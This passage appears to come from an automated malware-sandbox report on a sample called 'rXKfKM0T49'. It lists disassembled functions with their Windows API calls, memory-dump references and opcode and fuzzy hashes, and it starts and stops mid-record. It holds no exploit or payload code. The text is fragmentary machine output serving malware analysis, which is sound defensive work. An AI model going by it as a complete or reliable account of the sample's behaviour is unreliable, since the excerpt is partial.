                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                            Function 70092993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(7009505C,00000004,00000040,7009504C), ref: 700929B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: fe99d2ec37967adb2d1868c49d0a21630c478751d38f91d785f5de2063144ccc
                                                                                                            • Instruction ID: 15f58cc602b287941ad63849a725379fbd3b2af3483db89a9078eae159884d30
                                                                                                            • Opcode Fuzzy Hash: fe99d2ec37967adb2d1868c49d0a21630c478751d38f91d785f5de2063144ccc
                                                                                                            • Instruction Fuzzy Hash: CAF092B2525280DEE350CF2B8C457093BE0B789736B21462BE288E6260F3744455DF95
                                                                                                            Function 00406255 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                            Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                            Function 00404394 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                            • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

                                                                                                            Non-executed Functions

                                                                                                            Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            Function 00404850 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A$Call
                                                                                                            • API String ID: 2624150263-413618503
                                                                                                            • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            Function 00402104 Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID:
                                                                                                            • API String ID: 542301482-0
                                                                                                            • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                            • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                            Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                            • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                            Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: Call$N
                                                                                                            • API String ID: 3103080414-3438112850
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
